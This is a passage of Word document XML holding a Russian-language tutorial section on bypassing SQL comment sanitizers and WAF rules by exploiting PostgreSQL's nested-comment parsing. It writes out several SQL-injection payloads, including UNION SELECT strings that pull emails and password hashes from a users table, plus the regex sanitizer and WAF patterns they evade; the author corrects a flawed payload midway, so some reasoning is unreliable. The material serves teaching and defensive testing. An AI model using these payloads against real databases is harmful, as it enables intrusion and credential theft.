      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C3036F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это создаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>семантический gap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между sanitizer и PG-парсером:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F679F27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer-non-nested-aware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.sub(r'/\*.*?\*/', '', payload)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — non-greedy: первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. То, что после первого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t>, — это «текст после комментария», для sanitizer-а activated SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65516F3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-парсер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — nested-aware: первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с учётом вложенных). Всё между ними — комментарий, ничего не активируется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0025495C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий контролирует, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>именно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sanitizer пометит как комментарий vs что PG выкинет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C0BDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — обход WAF `r"--|/\*"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDFF506" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: WAF из 3.9.0 содержит правило </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bDROP|TRUNCATE|GRANT|CREATE|ALTER\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для DDL и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"--|/\*"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для любых SQL-комментариев. WAF блокирует payload, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>содержащий любой комментарий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вообще. Атакующий хочет инжектировать SQL, не используя комментарий-маркер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C7EA4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но если разработчики ослабили правило до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"запретить только полные комментарии"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"/\*.*?\*/"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Python re с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.DOTALL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — payload с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>вложенной</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> структурой обходит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40748761" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A745F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin'/*outer/*inner*/' UNION SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF3C13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66407D64"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'admin'/*outer/*inner*/' UNION SELECT id,email,password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53175306" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Sanitizer Python (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.sub(r'/\*.*?\*/', '', q, flags=re.DOTALL)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non-greedy) видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D8E406" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin'/*outer/*inner*/' UNION SELECT id,email,password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB081A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                ^^^^^^^^^^^^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B152D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                первый /* — здесь</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30181E97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                          ^^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285A4606" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                          первый */ — здесь (за inner)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D0C61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitizer удаляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*outer/*inner*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (от первого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до первого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310A18F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin'' UNION SELECT id,email,password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3012A6E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После удаления </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (двойной апостроф = escaped quote) — sanitizer считает это «безопасный escape», пропускает. WAF не видит активного UNION-syntax после удаления, пропускает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56995EA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-парсер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> видит вложенность:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D13E1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin'/*outer/*inner*/' UNION ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A485AEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       ^                ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D58DD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">       /* — открывает   &lt;-- здесь вложенный /* /* открывает level 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE62AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                ^^      &lt;-- здесь */ закрывает level 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C087E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                       ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AEC9D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                       но нужно ещё закрыть level 1, поэтому ищет дальше matching */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04818DD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Стоп — здесь надо пересчитать. PG nested-aware значит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*outer/*inner*/...*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — два </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (level 1 и level 2), два </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (закрывает level 2, потом level 1). В payload — только ОДИН </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (за inner). Значит PG считает, что комментарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не закрыт</w:t>
      </w:r>
      <w:r>
        <w:t>, и весь остаток payload (вплоть до конца строки) — внутри комментария → SQL syntax error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792AC040" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>дефект Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в моей наивной форме. Правильный Payload A должен иметь корректный balance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781E46F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin'/*outer/*inner*/*/  UNION SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C956B57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43BAF4"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'admin'/*outer/*inner*/*/  UNION SELECT id,email,password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067EE06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitizer non-greedy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*outer/*inner*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — закрывается на первом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Остаток: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/  UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — sanitizer видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как «синтаксис ошибки, но не комментарий» (это просто текст для него) — пропускает. WAF видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>триггерит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Здесь надо добавить 3.9.6 (whitespace) или 3.9.5 (encoding) на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E230551" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Альтернативный Payload — точно сбалансированная структура, которая для PG = пустота:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108FC38E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin'/**/UNION/**/SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764DD940" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Это уже 3.9.6 (whitespace через /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/). Граница: 3.12.1 — про </w:t>
      </w:r>
      <w:r>
        <w:t>обход sanitizer на NEST-семантике</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, 3.9.6 — про </w:t>
      </w:r>
      <w:r>
        <w:t>whitespace-equivalent**. Разные углы атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23947512" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — sanitizer ел весь nested-block как один комментарий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C0118" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: sanitizer более sophisticated — он greedy, удаляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"/\*.*\*/"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> greedy (Python re </w:t>
      </w:r>
      <w:r>
        <w:rPr>
